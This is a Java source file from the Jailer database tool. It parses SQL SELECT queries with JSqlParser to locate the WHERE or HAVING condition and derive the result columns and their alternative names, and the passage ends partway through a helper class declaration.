<filename>src/main/gui/net/sf/jailer/ui/databrowser/whereconditioneditor/WCTypeAnalyser.java /* * Copyright 2007 - 2021 <NAME>. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package net.sf.jailer.ui.databrowser.whereconditioneditor; import java.sql.SQLException; import java.util.ArrayList; import java.util.HashSet; import java.util.LinkedHashMap; import java.util.List; import java.util.Map; import java.util.Map.Entry; import java.util.Set; import java.util.function.Consumer; import java.util.regex.Matcher; import java.util.regex.Pattern; import java.util.stream.Collectors; import org.apache.log4j.Logger; import net.sf.jailer.datamodel.PrimaryKey; import net.sf.jailer.datamodel.Table; import net.sf.jailer.ui.databrowser.metadata.MDSchema; import net.sf.jailer.ui.databrowser.metadata.MDTable; import net.sf.jailer.ui.databrowser.metadata.MetaDataDetailsPanel; import net.sf.jailer.ui.databrowser.metadata.MetaDataSource; import net.sf.jailer.util.JSqlParserUtil; import net.sf.jailer.util.LogUtil; import net.sf.jailer.util.Pair; import net.sf.jailer.util.Quoting; import net.sf.jailer.util.SqlUtil; import net.sf.jsqlparser.JSQLParserException; import net.sf.jsqlparser.expression.AnalyticExpression; import net.sf.jsqlparser.expression.AnyComparisonExpression; import net.sf.jsqlparser.expression.ArrayConstructor; import net.sf.jsqlparser.expression.ArrayExpression; import net.sf.jsqlparser.expression.CaseExpression; import net.sf.jsqlparser.expression.CastExpression; import net.sf.jsqlparser.expression.CollateExpression; import net.sf.jsqlparser.expression.ConnectByRootOperator; import net.sf.jsqlparser.expression.DateTimeLiteralExpression; import net.sf.jsqlparser.expression.DateValue; import net.sf.jsqlparser.expression.DoubleValue; import net.sf.jsqlparser.expression.Expression; import net.sf.jsqlparser.expression.ExpressionVisitor; import net.sf.jsqlparser.expression.ExtractExpression; import net.sf.jsqlparser.expression.Function; import net.sf.jsqlparser.expression.HexValue; import net.sf.jsqlparser.expression.IntervalExpression; import net.sf.jsqlparser.expression.JdbcNamedParameter; import net.sf.jsqlparser.expression.JdbcParameter; import net.sf.jsqlparser.expression.JsonAggregateFunction; import net.sf.jsqlparser.expression.JsonExpression; import net.sf.jsqlparser.expression.JsonFunction; import net.sf.jsqlparser.expression.KeepExpression; import net.sf.jsqlparser.expression.LongValue; import net.sf.jsqlparser.expression.MySQLGroupConcat; import net.sf.jsqlparser.expression.NextValExpression; import net.sf.jsqlparser.expression.NotExpression; import net.sf.jsqlparser.expression.NullValue; import net.sf.jsqlparser.expression.NumericBind; import net.sf.jsqlparser.expression.OracleHierarchicalExpression; import net.sf.jsqlparser.expression.OracleHint; import net.sf.jsqlparser.expression.OracleNamedFunctionParameter; import net.sf.jsqlparser.expression.Parenthesis; import net.sf.jsqlparser.expression.RowConstructor; import net.sf.jsqlparser.expression.RowGetExpression; import net.sf.jsqlparser.expression.SignedExpression; import net.sf.jsqlparser.expression.StringValue; import net.sf.jsqlparser.expression.TimeKeyExpression; import net.sf.jsqlparser.expression.TimeValue; import net.sf.jsqlparser.expression.TimestampValue; import net.sf.jsqlparser.expression.TimezoneExpression; import net.sf.jsqlparser.expression.UserVariable; import net.sf.jsqlparser.expression.ValueListExpression; import net.sf.jsqlparser.expression.VariableAssignment; import net.sf.jsqlparser.expression.WhenClause; import net.sf.jsqlparser.expression.XMLSerializeExpr; import net.sf.jsqlparser.expression.operators.arithmetic.Addition; import net.sf.jsqlparser.expression.operators.arithmetic.BitwiseAnd; import net.sf.jsqlparser.expression.operators.arithmetic.BitwiseLeftShift; import net.sf.jsqlparser.expression.operators.arithmetic.BitwiseOr; import net.sf.jsqlparser.expression.operators.arithmetic.BitwiseRightShift; import net.sf.jsqlparser.expression.operators.arithmetic.BitwiseXor; import net.sf.jsqlparser.expression.operators.arithmetic.Concat; import net.sf.jsqlparser.expression.operators.arithmetic.Division; import net.sf.jsqlparser.expression.operators.arithmetic.IntegerDivision; import net.sf.jsqlparser.expression.operators.arithmetic.Modulo; import net.sf.jsqlparser.expression.operators.arithmetic.Multiplication; import net.sf.jsqlparser.expression.operators.arithmetic.Subtraction; import net.sf.jsqlparser.expression.operators.conditional.AndExpression; import net.sf.jsqlparser.expression.operators.conditional.OrExpression; import net.sf.jsqlparser.expression.operators.conditional.XorExpression; import net.sf.jsqlparser.expression.operators.relational.Between; import net.sf.jsqlparser.expression.operators.relational.ComparisonOperator; import net.sf.jsqlparser.expression.operators.relational.EqualsTo; import net.sf.jsqlparser.expression.operators.relational.ExistsExpression; import net.sf.jsqlparser.expression.operators.relational.FullTextSearch; import net.sf.jsqlparser.expression.operators.relational.GreaterThan; import net.sf.jsqlparser.expression.operators.relational.GreaterThanEquals; import net.sf.jsqlparser.expression.operators.relational.InExpression; import net.sf.jsqlparser.expression.operators.relational.IsBooleanExpression; import net.sf.jsqlparser.expression.operators.relational.IsNullExpression; import net.sf.jsqlparser.expression.operators.relational.JsonOperator; import net.sf.jsqlparser.expression.operators.relational.LikeExpression; import net.sf.jsqlparser.expression.operators.relational.Matches; import net.sf.jsqlparser.expression.operators.relational.MinorThan; import net.sf.jsqlparser.expression.operators.relational.MinorThanEquals; import net.sf.jsqlparser.expression.operators.relational.NotEqualsTo; import net.sf.jsqlparser.expression.operators.relational.RegExpMatchOperator; import net.sf.jsqlparser.expression.operators.relational.RegExpMySQLOperator; import net.sf.jsqlparser.expression.operators.relational.SimilarToExpression; import net.sf.jsqlparser.parser.ASTNodeAccess; import net.sf.jsqlparser.parser.SimpleNode; import net.sf.jsqlparser.schema.Column; import net.sf.jsqlparser.statement.Statement; import net.sf.jsqlparser.statement.StatementVisitorAdapter; import net.sf.jsqlparser.statement.select.AllColumns; import net.sf.jsqlparser.statement.select.AllTableColumns; import net.sf.jsqlparser.statement.select.FromItemVisitor; import net.sf.jsqlparser.statement.select.Join; import net.sf.jsqlparser.statement.select.LateralSubSelect; import net.sf.jsqlparser.statement.select.OrderByElement; import net.sf.jsqlparser.statement.select.ParenthesisFromItem; import net.sf.jsqlparser.statement.select.PlainSelect; import net.sf.jsqlparser.statement.select.Select; import net.sf.jsqlparser.statement.select.SelectExpressionItem; import net.sf.jsqlparser.statement.select.SelectItem; import net.sf.jsqlparser.statement.select.SelectItemVisitor; import net.sf.jsqlparser.statement.select.SelectVisitor; import net.sf.jsqlparser.statement.select.SelectVisitorAdapter; import net.sf.jsqlparser.statement.select.SetOperationList; import net.sf.jsqlparser.statement.select.SubJoin; import net.sf.jsqlparser.statement.select.SubSelect; import net.sf.jsqlparser.statement.select.TableFunction; import net.sf.jsqlparser.statement.select.ValuesList; import net.sf.jsqlparser.statement.select.WithItem; import net.sf.jsqlparser.statement.values.ValuesStatement; /** * Parses a SQL query and tries to find out the type. * * @author <NAME> */ public class WCTypeAnalyser { /** * The logger. */ private static final Logger logger = Logger.getLogger(MetaDataDetailsPanel.class); public static class Result { public Table table; public String cte; public boolean hasCondition; public boolean isHaving; // having/where public int conditionStart; public int conditionEnd; public String originalQuery; public Set<String> getAlternativeNames(String name) { Set<String> names = alternativeNames.get(name); if (names == null) { names = alternativeNames.get("(" + name + ")"); } return names; } private Map<String, Set<String>> alternativeNames = new LinkedHashMap<String, Set<String>>(); private void addAlternativeName(String name, String alternativeName, Quoting quoting) { Set<String> names = alternativeNames.get(name); if (names == null) { names = new HashSet<String>(); alternativeNames.put(name, names); } names.add(alternativeName); Set<String> finalNames = names; Consumer<String> bracketing = bName -> { if (isValidBracketing(bName)) { finalNames.add(bName.substring(1, bName.length() - 1).trim()); } String bracket = "(" + bName + ")"; if (isValidBracketing(bracket)) { finalNames.add(bracket); } }; bracketing.accept(alternativeName); if (isValidQuoting(alternativeName)) { String unquoted = quoting.unquote(alternativeName); names.add(unquoted); if (!alternativeName.equals(unquoted)) { bracketing.accept(unquoted); } } String quoted = quoting.requote(alternativeName, true); if (isValidQuoting(quoted)) { names.add(quoted); if (!alternativeName.equals(quoted)) { bracketing.accept(quoted); } } } private void addAlternativeName(String name, String altQuantifier, String alternativeName, Quoting quoting) { String uqAltQuantifier = null; String qAltQuantifier = null; if (quoting.isQuoted(altQuantifier) && isValidQuoting(altQuantifier)) { uqAltQuantifier = quoting.unquote(altQuantifier); } String quoted = quoting.requote(altQuantifier, true); if (isValidQuoting(quoted)) { qAltQuantifier = quoted; } uqAltQuantifier = uqAltQuantifier == null? altQuantifier : uqAltQuantifier; qAltQuantifier = qAltQuantifier == null? altQuantifier : qAltQuantifier; String uqAlternativeName = null; String qAlternativeName = null; if (quoting.isQuoted(alternativeName) && isValidQuoting(alternativeName)) { uqAlternativeName = quoting.unquote(alternativeName); } quoted = quoting.requote(alternativeName, true); if (isValidQuoting(quoted)) { qAlternativeName = quoted; } uqAlternativeName = uqAlternativeName == null? alternativeName : uqAlternativeName; qAlternativeName = qAlternativeName == null? alternativeName : qAlternativeName; addAlternativeName(name, qAltQuantifier + "." + qAlternativeName, quoting); addAlternativeName(name, uqAltQuantifier + "." + uqAlternativeName, quoting); addAlternativeName(name, uqAltQuantifier + "." + qAlternativeName, quoting); addAlternativeName(name, qAltQuantifier + "." + uqAlternativeName, quoting); } private boolean isValidQuoting(String name) { if (name.length() < 3) { return false; } if (name.charAt(0) != name.charAt(name.length() - 1)) { return false; } String mid = name.substring(1, name.length() - 1); return mid.indexOf(name.charAt(0)) < 0 && mid.indexOf('.') < 0; } private boolean isValidBracketing(String name) { if (!(name.startsWith("(") && name.endsWith(")"))) { return false; } int level = 0; for (int i = 0; i < name.length(); ++i) { char c = name.charAt(i); if (c == '(') { ++level; } else if (c == ')') { --level; if (level < 0) { return false; } } } return level == 0; } public void addAlias(String name, String alias) { Set<String> names = alternativeNames.get(name); if (names == null) { names = new HashSet<String>(); alternativeNames.put(name, names); } names.add(alias); names.add(name); alternativeNames.put(alias, names); } @Override public String toString() { return "Result [table=" + table + ", Columns=" + table.getColumns() + ", hasCondition=" + hasCondition + ", isHaving=" + isHaving + ", conditionStart=" + conditionStart + ", conditionEnd=" + conditionEnd + ", Cond=" + table.getName().substring(conditionStart, conditionEnd) + ", Length=" + table.getName().length() + ", Cte=" + cte + "]"; } } /** * Parses a SQL query and tries to find out the type. * * @param sqlSelect the query * @return the type or <code>null</code> */ public static Result getType(String sqlSelect, MetaDataSource metaDataSource, Quoting quoting) { Result result = new Result(); result.originalQuery = sqlSelect; net.sf.jsqlparser.statement.Statement st; try { StringBuilder woComments = new StringBuilder(SqlUtil.removeComments(sqlSelect)); String woCommentsAndLiterals = SqlUtil.removeCommentsAndLiterals(sqlSelect); String topLevelSql = SqlUtil.removeSubQueries(sqlSelect); StringBuilder cte = new StringBuilder(); st = JSqlParserUtil.parse(woComments.toString(), 2); int[] unknownTableCounter = new int[1]; final LinkedHashMap<String, MDTable> fromClause = analyseFromClause(st, unknownTableCounter, metaDataSource); final List<net.sf.jailer.datamodel.Column> selectClause = new ArrayList<net.sf.jailer.datamodel.Column>(); st.accept(new StatementVisitorAdapter() { private void clearInStatement(Object o) { if (o != null) { Pair<Integer, Integer> pos = null; if (!(o instanceof LikeExpression) && (o instanceof ASTNodeAccess && ((ASTNodeAccess) o).getASTNode() != null)) { SimpleNode node = ((ASTNodeAccess) o).getASTNode(); pos = new Pair<Integer, Integer>(node.jjtGetFirstToken().absoluteBegin - 1, node.jjtGetLastToken().absoluteEnd - 1); } else { String sql = o.toString(); pos = findFragment(sql, woComments.toString()); if (pos == null) { pos = findFragment(sql, woCommentsAndLiterals); } if (pos == null) { pos = findFragment(sql, topLevelSql); } } if (pos != null) { for (int i = pos.a; i < pos.b; ++i) { woComments.setCharAt(i, ' '); } } } } @Override public void visit(Select select) { select.getSelectBody().accept(new SelectVisitor() { @Override public void visit(WithItem withItem) { } @Override public void visit(SetOperationList setOpList) { throw new QueryTooComplexException(); } @Override public void visit(PlainSelect plainSelect) { clearInStatement(plainSelect.getLimit()); clearInStatement(plainSelect.getDistinct()); clearInStatement(plainSelect.getTop()); clearInStatement(plainSelect.getFetch()); clearInStatement(plainSelect.getFirst()); clearInStatement(plainSelect.getForUpdateTable()); clearInStatement(plainSelect.getForXmlPath()); clearInStatement(plainSelect.getIntoTables()); clearInStatement(plainSelect.getOffset()); clearInStatement(plainSelect.getKsqlWindow()); clearInStatement(plainSelect.getMySqlHintStraightJoin()); clearInStatement(plainSelect.getMySqlSqlCalcFoundRows()); clearInStatement(plainSelect.getMySqlSqlNoCache()); clearInStatement(plainSelect.getOptimizeFor()); clearInStatement(plainSelect.getOracleHierarchical()); clearInStatement(plainSelect.getOracleHint()); clearInStatement(plainSelect.getSkip()); clearInStatement(plainSelect.getWait()); List<OrderByElement> orderByElements = plainSelect.getOrderByElements(); if (orderByElements != null) { clearInStatement("order by " + orderByElements.stream().map(e -> e.toString()).collect(Collectors.joining(", "))); } Expression cond = null; if (plainSelect.getGroupBy() != null) { result.isHaving = true; cond = plainSelect.getHaving(); } else { result.isHaving = false; cond = plainSelect.getWhere(); } if (cond != null) { result.hasCondition = true; Pair<Integer, Integer> pos = null; if (!(cond instanceof LikeExpression) && (cond instanceof ASTNodeAccess && ((ASTNodeAccess) cond).getASTNode() != null)) { SimpleNode node = ((ASTNodeAccess) cond).getASTNode(); pos = new Pair<Integer, Integer>(node.jjtGetFirstToken().absoluteBegin - 1, node.jjtGetLastToken().absoluteEnd - 1); } else { String sql = cond.toString(); pos = findFragment(sql, woComments.toString()); if (pos == null) { pos = findFragment(sql, woCommentsAndLiterals); } if (pos == null) { pos = findFragment(sql, topLevelSql); } if (pos == null) { pos = findFragment((result.isHaving? "having " : "where ") + sql, topLevelSql); if (pos == null) { pos = findFragment((result.isHaving? "having " : "where ") + sql, woComments.toString()); } if (pos != null) { Pattern p = Pattern.compile("^(" + (result.isHaving? "having" : "where") + "\\s+)", Pattern.CASE_INSENSITIVE); Matcher matcher = p.matcher(topLevelSql.substring(pos.a, pos.b)); if (matcher.find()) { pos = new Pair<Integer, Integer>(pos.a + matcher.end(), pos.b); } else { pos = null; } } } } if (pos != null) { result.conditionStart = pos.a; result.conditionEnd = pos.b; } else { if (!warned) { LogUtil.warn(new RuntimeException("Cond. not found: " + cond + ":" + (woComments.toString().replaceAll("\\s+", " ")))); warned = true; } throw new QueryTooComplexException(); } } else { result.hasCondition = false; } int selectEnd = plainSelect.getSelectItems().get(plainSelect.getSelectItems().size() - 1).getASTNode().jjtGetLastToken().absoluteEnd - 1; int plainSelectStart = plainSelect.getASTNode().jjtGetFirstToken().absoluteBegin - 1; cte.append(woComments.toString().substring(0, plainSelectStart)); for (int i = 0; i < selectEnd; ++i) { woComments.setCharAt(i, ' '); } woComments.setCharAt(selectEnd - 1, '\f'); Pair<Integer, Integer> pos = findFragment("\f from", woComments.toString()); if (pos != null) { for (int i = pos.a; i < pos.b; ++i) { woComments.setCharAt(i, ' '); } } else { throw new QueryTooComplexException(); } for (SelectItem si: plainSelect.getSelectItems()) { si.accept(new SelectItemVisitor() { @Override public void visit(SelectExpressionItem selectExpressionItem) { try { int a = selectExpressionItem.getASTNode().jjtGetFirstToken().absoluteBegin - 1; int b = selectExpressionItem.getASTNode().jjtGetLastToken().absoluteEnd - 1; String sql = sqlSelect.substring(a, b); if (selectExpressionItem.getAlias() != null) { sql = sql.replaceAll("\\s*" + (selectExpressionItem.getAlias().isUseAs()? "as\\s+" : "") + Pattern.quote(selectExpressionItem.getAlias().getName()) + "\\s*$", ""); } boolean[] noSubexpression = new boolean[] { true }; final Column column[] = new Column[1]; selectExpressionItem.getExpression().accept(createExpressionVisitor(noSubexpression, column)); boolean isNullable = true; if (column[0] != null) { String alias = null; if (column[0].getTable() != null) { if (column[0].getTable().getAlias() != null) { alias = column[0].getTable().getAlias().getName(); } else { alias = column[0].getTable().getName(); } } if (noSubexpression[0]) { net.sf.jailer.datamodel.Column col; try { col = findColumn(alias, column[0].getColumnName(), fromClause, metaDataSource); if (col != null) { isNullable = col.isNullable; } } catch (SQLException e) { // ignore } if (unknownTableCounter[0] == 0) { String uniqueColumnAlias = findUniqueAliasOfTableColumn(column[0].getColumnName(), fromClause); if (uniqueColumnAlias != null) { if (column[0].getTable() != null) { if (idEquals(column[0].getTable().getFullyQualifiedName(), uniqueColumnAlias, false)) { result.addAlternativeName(sql, column[0].getColumnName(), quoting); } } else { result.addAlternativeName(sql, uniqueColumnAlias, column[0].getColumnName(), quoting); } } } } } net.sf.jailer.datamodel.Column col = new net.sf.jailer.datamodel.Column(sql, null, -1, -1); col.isNullable = isNullable; selectClause.add(col); } catch (Exception e) { LogUtil.warn(e); throw new QueryTooComplexException(); } } @Override public void visit(AllTableColumns allTableColumns) { String tableName = allTableColumns.getTable().getName(); String tableAlias = null; if (tableName != null) { tableAlias = findTable(tableName, fromClause); } if (tableAlias == null) { throw new QueryTooComplexException(); } MDTable mdTable = fromClause.get(tableAlias); try { List<String> columns = mdTable.getColumns(false); if (columns.isEmpty()) { LogUtil.warn(new RuntimeException("Table without columns: " + mdTable.getName() + "/" + ((mdTable.getSchema() == null? "null" : mdTable.getSchema().getName())) + " " + sqlSelect)); } for (String c: columns) { net.sf.jailer.datamodel.Column col = findColumn(tableAlias, c, fromClause, metaDataSource); boolean isNullable = col == null || col.isNullable; col = new net.sf.jailer.datamodel.Column((unknownTableCounter[0] != 0 || fromClause.size() != 1? tableAlias + "." : "") + c, null, -1, -1); col.isNullable = isNullable; selectClause.add(col); if (unknownTableCounter[0] == 0) { String uniqueColumnAlias = findUniqueAliasOfTableColumn(c, fromClause); if (uniqueColumnAlias != null) { if (idEquals(allTableColumns.getTable().getFullyQualifiedName(), uniqueColumnAlias, false)) { if (fromClause.size() != 1) { result.addAlternativeName(col.name, c, quoting); } else { result.addAlternativeName(col.name, tableAlias, c, quoting); } } } } } } catch (SQLException e) { logger.info("error", e); throw new QueryTooComplexException(); } } @Override public void visit(AllColumns allColumns) { for (Entry<String, MDTable> e: fromClause.entrySet()) { MDTable mdTable = e.getValue(); if (mdTable == null) { throw new QueryTooComplexException(); } try { List<String> columns = mdTable.getColumns(false); if (columns.isEmpty()) { LogUtil.warn(new RuntimeException("Table without columns: " + mdTable.getName() + "/" + ((mdTable.getSchema() == null? "null" : mdTable.getSchema().getName())) + " " + sqlSelect)); } for (String c: columns) { net.sf.jailer.datamodel.Column col = findColumn(e.getKey(), c, fromClause, metaDataSource); boolean isNullable = col == null || col.isNullable; col = new net.sf.jailer.datamodel.Column((unknownTableCounter[0] != 0 || fromClause.size() != 1? e.getKey() + "." : "") + c, null, -1, -1); col.isNullable = isNullable; selectClause.add(col); if (unknownTableCounter[0] == 0) { String uniqueColumnAlias = findUniqueAliasOfTableColumn(c, fromClause); if (uniqueColumnAlias != null) { if (idEquals(e.getKey(), uniqueColumnAlias, false)) { if (fromClause.size() != 1) { result.addAlternativeName(col.name, c, quoting); } else { result.addAlternativeName(col.name, e.getKey(), c, quoting); } } } } } } catch (SQLException e2) { logger.info("error", e2); throw new QueryTooComplexException(); } } } }); } } @Override public void visit(ValuesStatement aThis) { throw new QueryTooComplexException(); } }); } }); for (int i1 = 0; i1 < selectClause.size(); ++i1) { for (int i2 = 0; i2 < selectClause.size(); ++i2) { net.sf.jailer.datamodel.Column c1 = selectClause.get(i1); net.sf.jailer.datamodel.Column c2 = selectClause.get(i2); if (c1 != null && c2 != null && c1 != c2 && c1.name != null && c2.name != null) { if (c1.name.replaceAll("\\s+", "").toLowerCase().endsWith(c2.name.replaceAll("\\s+", "").toLowerCase())) { String name = "(" + c1.name + ")"; result.addAlias(c1.name, name); net.sf.jailer.datamodel.Column newColumn = new net.sf.jailer.datamodel.Column(name, c1.type, c1.length, c1.precision); newColumn.isNullable = c1.isNullable; selectClause.set(i1, newColumn); } } } } PrimaryKey pk = new PrimaryKey(new ArrayList<net.sf.jailer.datamodel.Column>(), false); Table table = new Table(woComments.toString(), pk, false, false); table.setColumns(selectClause); result.table = table; result.cte = cte.toString(); if (result.table.getColumns().isEmpty()) { return null; } selectClause.forEach(c -> result.addAlternativeName(c.name, c.name, quoting)); return result; } catch (QueryTooComplexException e) { // ignore } catch (JSQLParserException e) { if (!warned) { LogUtil.warn(new RuntimeException(sqlSelect + ": " + e.getMessage())); warned = true; } } catch (Throwable t) { LogUtil.warn(t); } return null; } protected static Pair<Integer, Integer> findFragment(String fragment, String sql) { Pair<Integer, Integer> pos = null; Pattern pattern = Pattern.compile(SqlUtil.createSQLFragmentSearchPattern(fragment, false), Pattern.CASE_INSENSITIVE); Matcher matcher = pattern.matcher(sql); if (matcher.find()) { pos = new Pair<Integer, Integer>(matcher.start(), matcher.end()); if (matcher.find()) { // not unique pos = null; } } return pos; } private static LinkedHashMap<String, MDTable> analyseFromClause(Statement st, int[] unknownTableCounter, final MetaDataSource metaDataSource) { final LinkedHashMap<String, MDTable> result = new LinkedHashMap<String, MDTable>(); unknownTableCounter[0] = 0; st.accept(new StatementVisitorAdapter() { @Override public void visit(Select select) { select.getSelectBody().accept(new SelectVisitor() { @Override public void visit(WithItem withItem) { } @Override public void visit(SetOperationList setOpList) { } @Override public void visit(PlainSelect plainSelect) { if (plainSelect.getFromItem() != null) { final FromItemVisitor fromItemVisitor = new FromItemVisitor() { private void unknownTable() { result.put("-unknown-" + (unknownTableCounter[0]++), null); } @Override public void visit(TableFunction tableFunction) { unknownTable(); } @Override public void visit(ValuesList valuesList) { unknownTable(); } @Override public void visit(LateralSubSelect lateralSubSelect) { unknownTable(); } @Override public void visit(SubJoin subjoin) { subjoin.getLeft().accept(this); if (subjoin.getJoinList() != null) { for (Join join: subjoin.getJoinList()) { join.getRightItem().accept(this); } } } @Override public void visit(SubSelect subSelect) { unknownTable(); } @Override public void visit(net.sf.jsqlparser.schema.Table tableName) { String schema = tableName.getSchemaName(); String name = tableName.getName(); if (tableName.getPivot() != null) { unknownTable(); } else { MDSchema mdSchema = null; if (metaDataSource.isInitialized()) { if (schema == null) { mdSchema = metaDataSource.getDefaultSchema(); } else { mdSchema = metaDataSource.find(schema); } } if (mdSchema != null) { MDTable mdTable; if (!mdSchema.isLoaded()) { mdSchema.loadTables(true, null, null, null); mdTable = null; } else { mdTable = mdSchema.find(name); } if (mdTable != null) { result.put(tableName.getAlias() != null? tableName.getAlias().getName() : mdTable.getName(), mdTable); } else { unknownTable(); } } } } @Override public void visit(ParenthesisFromItem parenthesisFromItem) { if (parenthesisFromItem.getFromItem() != null) { parenthesisFromItem.getFromItem().accept(this); } } }; plainSelect.getFromItem().accept(fromItemVisitor); if (plainSelect.getJoins() != null) { for (Join join: plainSelect.getJoins()) { join.getRightItem().accept(fromItemVisitor); } } } } @Override public void visit(ValuesStatement aThis) { } }); } }); return result; } private static net.sf.jailer.datamodel.Column findColumn(String alias, String columnName, LinkedHashMap<String, MDTable> fromClause, MetaDataSource metaDataSource) throws SQLException { for (boolean strict: new boolean[] { false, true }) { for (Entry<String, MDTable> e: fromClause.entrySet()) { if (alias == null || idEquals(e.getKey(), alias, strict)) { if (e.getValue() != null) { Table table = metaDataSource.toTable(e.getValue()); if (table != null) { for (net.sf.jailer.datamodel.Column column: table.getColumns()) { if (column.name != null && idEquals(column.name, columnName, strict)) { return column; } } } } } } } return null; } private static String findUniqueAliasOfTableColumn(String columnName, LinkedHashMap<String, MDTable> fromClause) throws SQLException { String alias = null; for (Entry<String, MDTable> e: fromClause.entrySet()) { if (e.getValue() != null) { try { for (String column: e.getValue().getColumns()) { if (idEquals(column, columnName, false)) { if (alias != null) { return null; } alias = e.getKey(); break; } } } catch (SQLException ex) { logger.info("error", ex); throw new QueryTooComplexException(); } } else { return null; } } return alias; } private static String findTable(String tableName, LinkedHashMap<String, MDTable> fromClause) { for (boolean strict: new boolean[] { false, true }) { for (Entry<String, MDTable> e: fromClause.entrySet()) { if (idEquals(e.getKey(), tableName, strict)) { return e.getKey(); } } } return null; } private static boolean idEquals(String a, String b, boolean strict) { if (a == null || b == null) { return false; } if (strict) { return a.equals(b); } return Quoting.normalizeIdentifier(a).equals(Quoting.normalizeIdentifier(b)); } private static ExpressionVisitor createExpressionVisitor(final boolean[] noSubexpression, final Column[] column) { return new ExpressionVisitor() { @Override public void visit(Column tableColumn) { column[0] = tableColumn; } @Override public void visit(NotExpression aThis) { noSubexpression[0] = false; } @Override public void visit(DateTimeLiteralExpression literal) { noSubexpression[0] = false; } @Override public void visit(TimeKeyExpression timeKeyExpression) { noSubexpression[0] = false; } @Override public void visit(OracleHint hint) { noSubexpression[0] = false; } @Override public void visit(RowConstructor rowConstructor) { noSubexpression[0] = false; } @Override public void visit(MySQLGroupConcat groupConcat) { noSubexpression[0] = false; } @Override public void visit(KeepExpression aexpr) { noSubexpression[0] = false; } @Override public void visit(NumericBind bind) { noSubexpression[0] = false; } @Override public void visit(UserVariable var) { noSubexpression[0] = false; } @Override public void visit(RegExpMySQLOperator regExpMySQLOperator) { noSubexpression[0] = false; } @Override public void visit(JsonOperator jsonExpr) { noSubexpression[0] = false; } @Override public void visit(JsonExpression jsonExpr) { noSubexpression[0] = false; } @Override public void visit(RegExpMatchOperator rexpr) { noSubexpression[0] = false; } @Override public void visit(OracleHierarchicalExpression oexpr) { noSubexpression[0] = false; } @Override public void visit(IntervalExpression iexpr) { noSubexpression[0] = false; } @Override public void visit(ExtractExpression eexpr) { noSubexpression[0] = false; } @Override public void visit(AnalyticExpression aexpr) { noSubexpression[0] = false; } @Override public void visit(Modulo modulo) { noSubexpression[0] = false; } @Override public void visit(CastExpression cast) { noSubexpression[0] = false; } @Override public void visit(BitwiseXor bitwiseXor) { noSubexpression[0] = false; } @Override public void visit(BitwiseOr bitwiseOr) { noSubexpression[0] = false; } @Override public void visit(BitwiseAnd bitwiseAnd) { noSubexpression[0] = false; } @Override public void visit(Matches matches) { noSubexpression[0] = false; } @Override public void visit(Concat concat) { noSubexpression[0] = false; } @Override public void visit(AnyComparisonExpression anyComparisonExpression) { noSubexpression[0] = false; } @Override public void visit(ExistsExpression existsExpression) { noSubexpression[0] = false; } @Override public void visit(WhenClause whenClause) { noSubexpression[0] = false; } @Override public void visit(CaseExpression caseExpression) { noSubexpression[0] = false; } @Override public void visit(SubSelect subSelect) { noSubexpression[0] = false; } @Override public void visit(NotEqualsTo notEqualsTo) { noSubexpression[0] = false; } @Override public void visit(MinorThanEquals minorThanEquals) { noSubexpression[0] = false; } @Override public void visit(MinorThan minorThan) { noSubexpression[0] = false; } @Override public void visit(LikeExpression likeExpression) { noSubexpression[0] = false; } @Override public void visit(IsNullExpression isNullExpression) { noSubexpression[0] = false; } @Override public void visit(InExpression inExpression) { noSubexpression[0] = false; } @Override public void visit(GreaterThanEquals greaterThanEquals) { noSubexpression[0] = false; } @Override public void visit(GreaterThan greaterThan) { noSubexpression[0] = false; } @Override public void visit(EqualsTo equalsTo) { noSubexpression[0] = false; } @Override public void visit(Between between) { noSubexpression[0] = false; } @Override public void visit(OrExpression orExpression) { noSubexpression[0] = false; } @Override public void visit(AndExpression andExpression) { noSubexpression[0] = false; } @Override public void visit(Subtraction subtraction) { noSubexpression[0] = false; } @Override public void visit(Multiplication multiplication) { noSubexpression[0] = false; } @Override public void visit(Division division) { noSubexpression[0] = false; } @Override public void visit(Addition addition) { noSubexpression[0] = false; } @Override public void visit(StringValue stringValue) { noSubexpression[0] = false; } @Override public void visit(Parenthesis parenthesis) { noSubexpression[0] = false; } @Override public void visit(TimestampValue timestampValue) { noSubexpression[0] = false; } @Override public void visit(TimeValue timeValue) { noSubexpression[0] = false; } @Override public void visit(DateValue dateValue) { noSubexpression[0] = false; } @Override public void visit(HexValue hexValue) { noSubexpression[0] = false; } @Override public void visit(LongValue longValue) { noSubexpression[0] = false; } @Override public void visit(DoubleValue doubleValue) { noSubexpression[0] = false; } @Override public void visit(JdbcNamedParameter jdbcNamedParameter) { noSubexpression[0] = false; } @Override public void visit(JdbcParameter jdbcParameter) { noSubexpression[0] = false; } @Override public void visit(SignedExpression signedExpression) { noSubexpression[0] = false; } @Override public void visit(Function function) { noSubexpression[0] = false; } @Override public void visit(NullValue nullValue) { noSubexpression[0] = false; } @Override public void visit(BitwiseRightShift aThis) { noSubexpression[0] = false; } @Override public void visit(BitwiseLeftShift aThis) { noSubexpression[0] = false; } @Override public void visit(ValueListExpression valueList) { noSubexpression[0] = false; } @Override public void visit(IntegerDivision division) { noSubexpression[0] = false; } @Override public void visit(FullTextSearch fullTextSearch) { noSubexpression[0] = false; } @Override public void visit(IsBooleanExpression isBooleanExpression) { noSubexpression[0] = false; } @Override public void visit(NextValExpression aThis) { noSubexpression[0] = false; } @Override public void visit(CollateExpression aThis) { noSubexpression[0] = false; } @Override public void visit(SimilarToExpression aThis) { noSubexpression[0] = false; } @Override public void visit(ArrayExpression aThis) { noSubexpression[0] = false; } @Override public void visit(XorExpression orExpression) { noSubexpression[0] = false; } @Override public void visit(RowGetExpression rowGetExpression) { noSubexpression[0] = false; } @Override public void visit(ArrayConstructor aThis) { noSubexpression[0] = false; } @Override public void visit(VariableAssignment aThis) { noSubexpression[0] = false; } @Override public void visit(XMLSerializeExpr aThis) { noSubexpression[0] = false; } @Override public void visit(TimezoneExpression aThis) { noSubexpression[0] = false; } @Override public void visit(JsonAggregateFunction aThis) { noSubexpression[0] = false; } @Override public void visit(JsonFunction aThis) { noSubexpression[0] = false; } @Override public void visit(ConnectByRootOperator aThis) { noSubexpression[0] = false; } @Override public void visit(OracleNamedFunctionParameter aThis) { noSubexpression[0] = false; } }; } private static class QueryTooComplexException extends RuntimeException { } private static class PExpressionVisitorAdapter implements ExpressionVisitor { final Pattern exprPattern; 